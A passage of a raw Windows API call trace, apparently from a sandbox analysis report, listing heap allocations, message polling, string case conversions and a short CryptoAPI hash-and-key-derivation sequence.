hHeap=0x25c0000) returned 1 [0256.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0256.577] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.577] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.577] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0256.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.577] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.578] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.578] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0256.578] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.579] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0256.579] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0256.579] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.579] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.579] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.579] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.579] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.579] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.579] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.579] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.579] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.579] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.579] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.579] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.580] CryptCreateHash (in: hProv=0xad2698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0256.580] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.580] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.580] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.580] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.580] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0256.580] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.580] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.580] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.580] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.580] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.580] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.580] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.580] CryptHashData (hHash=0xaa5960, pbData=0x24b13c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0256.580] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.581] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.581] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.581] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.581] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.581] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.581] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.581] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.581] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.581] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.581] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.581] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.581] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.581] CryptDeriveKey (in: hProv=0xad2698, Algid=0x6601, hBaseData=0xaa5960, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0256.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0256.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0256.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0256.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0256.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0256.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0256.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0256.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0256.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0256.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0256.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0256.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0256.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0256.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0256.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.587] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.587] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0256.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0256.588] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0256.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0256.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0256.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0256.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0256.588] HeapFree (in: 